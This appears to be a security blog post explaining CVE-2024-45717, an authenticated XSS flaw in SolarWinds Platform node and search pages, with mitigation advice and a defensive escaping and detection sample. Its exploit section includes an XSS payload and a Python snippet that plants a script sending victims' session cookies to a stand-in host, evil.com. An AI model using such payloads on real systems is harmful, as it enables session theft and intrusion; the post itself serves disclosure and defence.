In June 2024, a new security flaw was found in the SolarWinds Platform—CVE-2024-45717. This vulnerability is a type of Cross-Site Scripting (XSS) bug that affects the search and node information section of the SolarWinds user interface. What sets this one apart is that an attacker must be logged in and get a user to interact with something malicious—so it’s not a simple, fire-and-forget hack.
In this post, we’ll break down how this vulnerability worked, look at example exploit steps, and share links to the original advisories and proofs of concept. We’ll also talk about how to stay safe if you’re using SolarWinds Platform.
What is CVE-2024-45717, Exactly?
SolarWinds Platform is a set of IT management tools used worldwide. The CVE-2024-45717 vulnerability affects search and node information pages in the platform. These pages were not handling user-supplied input safely, so specially crafted input (like a malicious search term) could inject JavaScript into the page.
Said simply:
If a logged-in attacker manages to trick another user (also logged in) into searching for or viewing specially crafted data, malicious code can run in their browser.
The Key Details
- Type: Stored/Reflected XSS (Cross-site scripting)
- User Interaction Needed: YES (target user must trigger the crafted input)
- CVE Reference: CVE-2024-45717 (MITRE)
- Vendor Advisory: SolarWinds Security Advisory
Let’s look at a possible exploitation scenario:
1. Get Authenticated Access: The attacker needs to log in to the SolarWinds platform with valid credentials (could be a low-privileged account).
2. Inject Malicious Input: The attacker inserts malicious JavaScript code in a search field or node info parameter (like the node Title or Description).
3. Trick a Victim: The attacker convinces another user (an admin or someone with more privileges) to view the manipulated search results or node info page.
4. Trigger and Run: When the victim visits the page, the code runs in their browser under their permissions.
Suppose a node’s "Description" field is vulnerable. The attacker might set the description to:
```html
<script>alert('XSS PoC by CVE-2024-45717');</script>
```
When an admin visits the node info page to see details, the browser will pop up an alert.
Of course, in real attacks, instead of an alert, attackers might steal session cookies, modify settings, or pivot further.
Here’s a quick step-by-step in pseudo-code:
```python
import requests

# Attacker (logged in) submits form with evil payload
payload = "<script>fetch('https://evil.com/?cookie='+document.cookie)</script>"
# Post request (example, Python-style):
requests.post(
    url="https://solarwinds.example.com/node/create",
    data={"description": payload},
    auth=("attacker", "password"),
)
# Victim administrator views node info page, browser loads the attacker's JavaScript
```
> Note: Never test this on live systems without permission!
System compromise: Chain with other vulnerabilities if reachable.
Since the attack requires a user to log in, the overall risk is limited, but for organizations where many users have access, the risk is more serious.
How to Fix or Mitigate
SolarWinds released a patch in June 2024.
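The root cause described above is user-supplied node and search text reaching the page without output encoding. The following is an added example, not SolarWinds code and not taken from the advisory: it renders a node description with and without HTML encoding and audits stored records for script-capable markup. The field names (`caption`, `description`) and the sample records are constructed assumptions.

```python
import html
import re

# Constructed sample records; field names are assumptions, not the SolarWinds schema.
NODES = [
    {"id": 1, "caption": "core-sw-01", "description": "Rack 4 <upper>, owner: netops"},
    {"id": 2, "caption": "edge-rtr-02",
     "description": "<script>alert('XSS PoC by CVE-2024-45717');</script>"},
    {"id": 3, "caption": "db-03", "description": '<img src=x onerror="alert(1)">'},
]

# Script-capable markup that should never appear in a plain-text field.
SUSPICIOUS = re.compile(
    r"<\s*(script|iframe|object|embed|svg)\b"  # active elements
    r"|\bon\w+\s*="                             # inline event handlers (onerror=, onload=)
    r"|javascript\s*:",                         # javascript: URLs
    re.IGNORECASE,
)


def render_unsafe(node):
    """The flawed pattern: stored text concatenated straight into HTML."""
    return f"<td class='desc'>{node['description']}</td>"


def render_safe(node):
    """Output encoding for an HTML body context: markup becomes inert text."""
    return f"<td class='desc'>{html.escape(node['description'], quote=True)}</td>"


def audit(nodes, fields=("caption", "description")):
    """Return ids of records whose text fields contain script-capable markup."""
    return [n["id"] for n in nodes
            if any(SUSPICIOUS.search(str(n.get(f, ""))) for f in fields)]


if __name__ == "__main__":
    for n in NODES:
        print(n["id"], render_safe(n))
    print("node ids to review:", audit(NODES))
```

Encoding at output is the actual fix; the audit is only a way to find records that were planted before patching, and a benign-looking description containing `<` (node 1) is encoded but not flagged.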
References & Further Reading
- CVE-2024-45717 at NIST NVD
- SolarWinds Security Advisory for CVE-2024-45717
- OWASP XSS Prevention Cheat Sheet
- Common Pitfalls in XSS Prevention
Wrap-up
CVE-2024-45717 is another reminder that security doesn’t stop at the firewall. Even authenticated sections of web apps can harbor dangerous bugs that need user awareness and swift patching to prevent attacks. If you use SolarWinds tools, make sure you’re up to date and keep an eye out for suspicious activity in your environment.
Have tips or questions about this CVE? Let us know in the comments! (And don’t hack anything you don’t own!)
Timeline
Published on: 12/04/2024 07:15:06 UTC